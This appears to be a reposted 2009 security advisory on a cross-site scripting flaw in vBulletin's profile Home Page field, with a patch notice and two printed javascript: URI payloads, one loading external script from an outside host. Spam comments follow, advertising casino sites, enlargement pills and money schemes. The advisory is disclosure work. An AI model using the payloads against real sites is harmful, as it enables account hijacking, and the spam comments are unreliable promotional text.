Home » 2009 » October » 13 » vBulletin - Cross Site Script Redirection
9:00 AM
vBulletin - Cross Site Script Redirection
vBulletin - Cross Site Script Redirection


Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases - simply
download the patch from the Members Area, extract the files and upload to
your webserver, overwriting the existing files. There is no upgrade script
required.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft?)

Researched & Disclosed by: MaXe (InterN0T.net)

Official Information:
http://www.vbulletin.com/forum/showthread.php?t=319572


-:: The Advisory ::-
The "Home Page" field in the user profile was only checking the user input
for either "www" or the following regular expression written in normal text:
Any letter from A to Z and/or a number from 0-9 + :// will make the link valid.

The output in the Home Page field is encoded with most likely htmlspecialchars(),
however before the patch it did not check if a user would create a link that
would send an unknowing user to either the data: or javascript URI scheme.

The only limits in the Home Page field are:
- 90 character limit
- Characters will be converted to html entities.
- We can only use the data or javascript URI scheme.

This means that we should avoid " since that becomes " .. The other
characters like < will become &lt; which is %3C which is almost the same.
Please see how htmlentities() and htmlspecialchars() works in PHP.

The following scheme input as home page will alert 0:
javascript://%0adocument.
write('<script>alert(0)</script>')

The following scheme is a Proof of Concept that external Javascript can be loaded:
javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')

The following URL contains a working Proof of Concept on the Contact Page:
http://forum.intern0t.net/members/maxe.html (will be removed soon)

-:: Solution ::-
Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

-:: Conclusion ::-
vBulletin is generally a safe and secure platform to use for large forums.
This security hole / exploit is implausible to actually work against people.
Please see: http://forum.intern0t.net/blogs/maxe/62-having-fun-cross-site-scripting.html for in-depth information.

Disclosure Information:
- Unknown date of when the vendor found the security hole.
- Vendor released patch on the 7th October 2009.
- Security hole researched and disclosed on 8th October 2009.

Disclosure Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1502-vbulletin-3-8-4-cross-site-script-redirection.html


All of the best,
Views: 24731 | Added by: apeh1706 | Rating: 0.0/0
Total comments: 391 2 3 4 »
39  
casino-x.ucoz.ru

38  
Любой текст 2 слова

37  
Как думаете правда или не правда тут написана что можно увеличить пенис таблетками для увеличения члена - VigRx Plus и Xtrasize, я вот думаю купить, может кто-то пробовал или знает методы как можно увеличить пенис в домашних условиях и без операции? Вот сайт официального дилера в Украине и России: http://tele.in.ua/ а вот их канадский поставщик: https://www.vigrxplus.com/ct/144762 , проверял через переводчик, ну там вроде все нормально, но по 1 или 3 напрямую заказывать оттуда стремно и дороже даже чем тот же Xtrasize да и смысла нет, а они говорят что покупают у них сразу по 12, поэтому поштучно выгоднее брать у них уже растаможенный Виг Эрикс и не морочить голову с доставкойю А мне бы не хотелось чтобы мои деньги с карточки пропали на каком-то зарубежном сайте или сам товар по дороге! Что думаете по этому поводу? Жду комментариев!

36  
http://pityiprogram2015.pl

35  
For anyone with an iPad, I recommend this iBook all about graffiti art: Henry Chalfant’s Graffiti Archive. It catalogs NYC subway graffiti in the 1980s … the beginning of Hip Hop! Whether you like art history, urban lore, sociology or even if you just like the pictures, this ibook is really cool. See here: [url=]https://itunes.apple.com/us/book/henry-chalfants-big-subway/id531594319?mt=11[/url]

34  
Доброго времени суток! smile
Может хватит работать на дядю? Пока еще есть такая возможность, станьте финансово независимыми!
Я не навязываю, но если вам интересно, то ознакомьтесь подробнее пока еще дается такая возможность - http://youmyprofi.ru/2/index.html

33  
Great post. I used to be checking continuously this blog and I'm impressed! Extremely helpful info specially the closing part :) I handle such information much. I used to be looking for this particular information for a very lengthy time. Thanks and best of luck. http://www.facebook.com/wholesalecheapsunglasseshats

32  
http://onehtcq.jigsy.com/ I have been lurking around here for very sometime but i havent made a comment, just thought i would say hello!

31  
Usually dislike any form of commenting, but whenever you read an excellent post sometimes you just need to get out of those lazy approaches. This is such a post!

30  
ОДНОКЛАССНИКИ ЗНАКОМСТВА

1-10 11-20 21-30 31-39
Name *:
Email *:
Code *: